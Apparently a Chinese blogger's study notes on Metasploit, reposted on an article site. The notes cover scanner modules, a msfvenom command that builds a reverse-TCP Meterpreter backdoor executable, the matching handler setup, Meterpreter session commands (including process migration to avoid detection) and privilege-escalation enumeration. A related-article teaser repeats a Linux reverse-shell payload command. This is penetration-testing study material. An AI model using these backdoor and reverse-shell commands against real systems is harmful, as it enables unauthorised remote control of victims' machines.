msf常用模块功能整理

这篇具有很好参考价值的文章主要介绍了msf常用模块功能整理。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

更新中

一.基础:

shell中直接输入msfconsole开始运行

  • use +模块路径 使用模块
  • search+模块关键字 用来搜索模块
  • back 返回主界面

模块中:

  • info 查看模块信息

  • show options 查看模块设置项

  • show targets 显示可选择的target(targert更像是给你选项,你去细化攻击细节,但是明明目标机器是64位系统,我选择target为64攻击不匹配,但是选择86却攻击成功,为什么呢?这个问题解决了,因为生成木马的时候会有生成64位还是32位的选项,默认是32位,也就是×86,因为木马是×86,既然x86的木马执行成功了,选择target自然也是x86

  • expolit/run 开始执行

高级设置:

set AutoRunScript migrate -f 自动迁移进程

二.信息收集:

主机存活探测:auxiliary/scanner/discovery/arp_sweep ARP 扫描auxiliary/scanner/discovery/udp_sweep UDP 扫描auxiliary/scanner/netbios/nbname NETBIOS 扫描auxiliary/scanner/snmp/snmp_enum SNMP 扫描auxiliary/scanner/smb/smb_version SMB 扫描端口扫描:auxiliary/scanner/portscan/ack TCP ACK 端口扫描auxiliary/scanner/portscan/ftpbounce FTP bounce 端口扫描auxiliary/scanner/portscan/syn SYN 端口扫描auxiliary/scanner/portscan/tcp TCP 端口扫描auxiliary/scanner/portscan/xmas TCP XMas 端口扫描

使用方法:1.用内网的机器开个代理,使kali的流量可以到达内网,然后使用模块扫描2.使用后门连接,通过session进行扫描3.在同一个内网里面可以直接扫描(一般不会有这种情况吧,除非我带着电脑潜入目标地点)这三点适用于内网渗透的很多场景

三.渗透

3.1反向后门的使用

我的话:

反弹shell是等受害机器来连接我,所以我在这里的设置,不需要去设置受害机器的ip,因为只要受害机器知道来哪里找我就行了

生成反向后门:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.43 lport=18888 -f exe >gg.exe

高亮为可设置参数,

lhost是监听机ip地址(也就是攻击者kali的ip地址)lport是监听端口(也就是攻击者准备接收反弹回来的shell的那个端口)

监听后门:

use exploit/multi/handler

use exploit/multi/handler   #通过use选择监听模块
set payload windows/meterpreter/reverse_tcp  #选择设置反弹shell的监听(这一步我有几次忽略了,导致出现错误,连接失败,所以这一步一定不要落下,设置监听的类型)
set lhost 192.168.43.43   #这里的ip和端口应该和后门代码保持一致
set lport 18888
exploit   #开始执行

meterpreter

获取到shell后,会为被控制的机器开启一个session(会话),msf可以同时监听多个session,并且在不同的session之间随意切换,黑客在session中执行命令等同于在目标主机执行命令,也可以使用msf的攻击模块通过session对目标主机进行攻击。在session中执行命令的模式也被称为meterpreter模式

session中:

 getuid #获取当前用户的权限吧,看演示里面一般是作这个用的
 migrate [进程号] #将后门进程迁移到其它进程里面,达到权限维持的效果(更不容易被发现)
 help        #可以显示在meterpreter模式下可以操作的指令列表(一部分)
 search [-d dir] [-r recurse] -f pattern   #在被控制的机器内搜索文件
 shell   #得到终端
 background     #把session放置后台
 ps    #列出所有进程,以及进程的信息(在这里可以看到pid,知道pid就可以使用kill来终止进程了)

session外:

session -l  #列出当前的所有session以及其信息
sessions -K   #关闭所有session连接,这里的k是大写
sessions -k [指定session的id]  #杀死指定id的session
sessions [id号]  #根据id号进入不同的session

3.2提权

补丁查询:

run post/windows/gather/enum_patches 查询补丁信息use post/multi/recon/local_exploit_suggester 这个模块可通过session查询当前可以用来提权的exp,(可能会失灵)文章来源地址https://www.toymoban.com/news/detail-440323.html

到了这里,关于msf常用模块功能整理的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • MSF中meterpreter和普通shell的区别

    详细命令参考这篇文章: msf之meterpreter命令 1.如上面所述,meterpreter比系统shell的功能更多丰富,功能很多,这里不进行尝试了 2.在流量传输过程中,meterpreter会对信息进行加密,接下来我将使用wireshark进行对比试验 这里的实验环境我采用的是两台虚拟机,一台kali(攻击机)

    2023年04月16日
    浏览(33)
  • msf--Linux反弹shell--一看就会的实验

    环境如下 vps :Linux ubuntu 4.15.0-180-generic (已经打开8989端口) win:Windows Feature Experience Pack 120.2212.4180.0(可以随意) 靶机:Linux ubuntu 4.18.0-25-generic 过程如下 1.在vps里面生成木马  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=8989 -f elf asd  2.将木马下载到本机桌面 sz a

    2023年04月13日
    浏览(53)
  • 初学Verilog语言基础笔记整理(实例点灯代码分析)持续更新~

    实例:点灯学习 刚接触 Verilog ,作为一个硬件小白,只能尝试着去理解,文章未完…持续更新。 参考博客文章: Verilog语言入门学习(1) Verilog语法 【 Verilog 】一文带你了解 Verilog 基础语法 - 子墨祭的文章 - 知乎 关于Verilog中的几种赋值语句 这里抄点,那里扣点,整理了一

    2024年02月07日
    浏览(46)
  • 【51单片机实验笔记】前篇(三) 模块功能封装汇总(持续更新)

    包含 常用 头文件 , 宏定义 , 自定义类型 , 函数工具 等。 包含 常用 延时函数 。 通用函数 兼容 延时函数 。 包含 常用 LED 显示函数。 主要实现了 延时法刷新 和 定时器法刷新 两种方式 。提供 字符静态写入函数 、 整数写入函数 、 浮点数写入函数 和 字符串写入函数

    2024年02月09日
    浏览(39)
  • 【PCL自学:目录】PCL简介及主要功能模块介绍 (持续更新)

    当你知道一切都不重要时,世界就是你的了。 ——《瑞克和莫蒂》S3E8   对于从事计算机视觉、机器视觉领域的从业者来说,OpenCV库并不陌生,甚至是我们入门这个领域时的学习的第一个开源库,如果说OpenCV是二维信息处理方面的工兵铲,那PCL(Point Cloud Library)就是在三维

    2024年02月06日
    浏览(51)
  • 数睿通2.0功能更新:支持多版本 Flink 切换,新增数据标签模块

    小伙伴们,大家好,数睿通 2.0 数据中台迎来了 12 月份的更新,由于年底工作繁忙,所以本次更新内容稍微少了点,还望理解,本次更新内容主要包括: 数据开发多版本 Flink 支持,执行任务的时候可以动态切换 Flink 版本,目前支持的版本有 1.14 和 1.16 新增数据标签模块,包

    2024年02月01日
    浏览(45)
  • 音视频学习之ffmpeg常用基础命令整理

    基于windows环境安装好必要的ffmpeg后,对ffmpeg基础命令进行一些了解:   有时候写入MP4文件会不成功,改成flv就好 1:视频裁剪:   2:文字水印: 编译的时候需要支持 FreeType、FontConfig、iconv,系统中需要有相关的子库, 在 FFmpeg 中增加纯字母水印可以使用 drawtext 滤镜进行支持

    2024年02月12日
    浏览(52)
  • 算法面试-深度学习基础面试题整理-AIGC相关(2023.9.01开始,持续更新...)

    1、stable diffusion和GAN哪个好?为什么 ? Stable diffusion是一种基于随机微分方程的生成方法,它通过逐步增加噪声来扰动原始图像,直到完全随机化。然后,它通过逐步减少噪声来恢复图像,同时使用一个神经网络来预测下一步的噪声分布。Stable Diffusion的优点是可以在连续的潜

    2024年02月10日
    浏览(48)
  • 一图看懂 setuptools 模块:一个功能齐全、积极维护且稳定的库,旨在方便打包Python项目,资料整理+笔记(大全)

    本文由 大侠(AhcaoZhu)原创,转载请声明。 链接: https://blog.csdn.net/Ahcao2008 全文介绍python的 setuptools 模块(一个功能齐全、积极维护且稳定的库,旨在方便打包Python项目)、函数、类及类的方法和属性。 它通过代码抓取并经AI智能翻译和人工校对。 是一部不可多得的权威字典类

    2024年02月06日
    浏览(49)
  • 前端使用elementui开发后台管理系统的常用功能(持续更新)

    前言:本次的文章完全是自己开发中遇到的一些问题,经过不断的修改终于完成的一些功能,当个快捷的查看手册吧~ 功能描述:数据使用的若依的字典,或者是自定义数据,可以点击每个选项进行选择,取消选择,也可以在已选择进行清除和单个删除 使用: @selection-change

    2024年02月09日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包